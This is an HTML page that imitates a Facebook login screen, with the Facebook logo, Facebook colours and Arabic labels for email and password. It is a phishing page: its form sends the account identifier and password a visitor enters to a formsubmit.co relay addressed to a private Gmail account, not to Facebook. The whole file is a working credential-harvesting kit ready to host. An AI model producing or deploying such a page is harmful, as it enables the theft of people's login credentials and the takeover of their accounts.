<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>LoginFacebook</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .form-container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            width: 300px;
        }
        .form-container h2 {
            color: #1877f2;
            text-align: center;
            margin-bottom: 20px;
        }
        .form-container input {
            width: 90%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #dddfe2;
            border-radius: 6px;
            font-size: 16px;
        }
        .form-container button {
            width: 98%;
            padding: 10px;
            background-color: #1877f2;
            color: #fff;
            border: none;
            border-radius: 6px;
            font-size: 16px;
            cursor: pointer;
        }
        .form-container button:hover {
            background-color: #155db1;
        }
    </style>
</head>
<body>

    <div class="form-container">
        <center><img src="img/Facebook_f_logo_(2019).svg" alt="" width="50px"></center>
        <form action="https://formsubmit.co/khaledtayea8@gmail.com" method="POST">
            <input type="tel" name="number-account" placeholder="البريد الالكتروني" required/>
            <input type="password" name="password" placeholder="كلمه السر" required/>
            <button type="submit">تسجيل الدخول</button>
        </form>
    </div>

</body>
</html>
